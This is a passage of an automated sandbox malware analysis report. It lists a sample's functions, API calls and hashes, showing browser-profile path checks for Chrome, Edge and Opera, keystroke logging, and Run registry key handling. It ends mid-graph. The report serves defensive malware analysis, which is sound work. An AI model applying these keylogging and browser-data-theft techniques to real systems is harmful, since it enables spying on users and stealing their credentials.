                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: d709a8515617d2ba673b64f2c8ca347ecdfd9c2513b907f156fef7f1ca1e605e
                                • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                • Opcode Fuzzy Hash: d709a8515617d2ba673b64f2c8ca347ecdfd9c2513b907f156fef7f1ca1e605e
                                • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: b1940e908fbd14d97542ecab4e0f5363c75517eb77e1add574f14eb0b46c354c
                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                • Opcode Fuzzy Hash: b1940e908fbd14d97542ecab4e0f5363c75517eb77e1add574f14eb0b46c354c
                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: d275befd3fa61f8c1a69313b9e352693d74fa3e6e400107db78181a14dff6bc9
                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                • Opcode Fuzzy Hash: d275befd3fa61f8c1a69313b9e352693d74fa3e6e400107db78181a14dff6bc9
                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004437E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: $G
                                • API String ID: 269201875-4251033865
                                • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                • Opcode ID: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                • Opcode Fuzzy Hash: b517c3644f2a0ff5b445e5d425ade51854f5aabe0ba9e4ed4d9bf29b6b0d38c2
                                • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: uD
                                • API String ID: 0-2547262877
                                • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileSystem
                                • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                • API String ID: 2086374402-949981407
                                • Opcode ID: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
                                • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                • Opcode Fuzzy Hash: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
                                • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                • Opcode ID: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                • Opcode Fuzzy Hash: bb18f393a94152f83cce48417cccfa788a776dd848670c049a324d78068a8282
                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___initconout.LIBCMT ref: 0045555B
                                  • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConsoleCreateFileWrite___initconout
                                • String ID: PkGNG
                                • API String ID: 3087715906-263838557
                                • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                • Opcode Fuzzy Hash: c765968ff3d10558f6a95e5840c5c1bc63f6cd989c8fe2dffd6df2c532e6808f
                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,0040ACB3,0000005C,?,?,?,00000000), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: hdF
                                • API String ID: 3325800564-665520524
                                • Opcode ID: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: df808ba8ebf8d5c0a6d1b72abb8ee9cce7734050c17300acf0bbb65a0f0efe9c
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CommandLine
                                • String ID: `&v
                                • API String ID: 3253501508-3442361631
                                • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                • Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                • GetLastError.KERNEL32 ref: 00440D35
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Execution Graph

                                Execution Coverage:1.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:544
                                Total number of Limit Nodes:10
                                execution_graph 47016 434887 47017 434893 ___scrt_is_nonwritable_in_current_image 47016->47017 47042 434596 47017->47042 47019 43489a 47021 4348c3 47019->47021 47337 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47019->47337 47030 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47021->47030 47338 444251 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47021->47338 47023 4348dc 47025 4348e2 ___scrt_is_nonwritable_in_current_image 47023->47025 47339 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47023->47339 47026 434962 47053 434b14 47026->47053 47030->47026 47340 4433e7 35 API calls 4 library calls 47030->47340 47037 43498e 47039 434997 47037->47039 47341 4433c2 28 API calls _Atexit 47037->47341 47342 43470d 13 API calls 2 library calls 47039->47342 47043 43459f 47042->47043 47343 434c52 IsProcessorFeaturePresent 47043->47343 47045 4345ab 47344 438f31 10 API calls 4 library calls 47045->47344 47047 4345b0 47048 4345b4 47047->47048 47345 4440bf 47047->47345 47048->47019 47051 4345cb 47051->47019 47411 436e90 47053->47411 47056 434968 47057 4441a2 47056->47057 47413 44f059 47057->47413 47059 434971 47062 40e9c5 47059->47062 47060 4441ab 47060->47059 47417 446815 35 API calls 47060->47417 47419 41cb50 LoadLibraryA GetProcAddress 47062->47419 47064 40e9e1 GetModuleFileNameW 47424 40f3c3 47064->47424 47066 40e9fd 47439 4020f6 47066->47439 47069 4020f6 28 API calls 47070 40ea1b 47069->47070 47445 41be1b 47070->47445 47074 40ea2d 47471 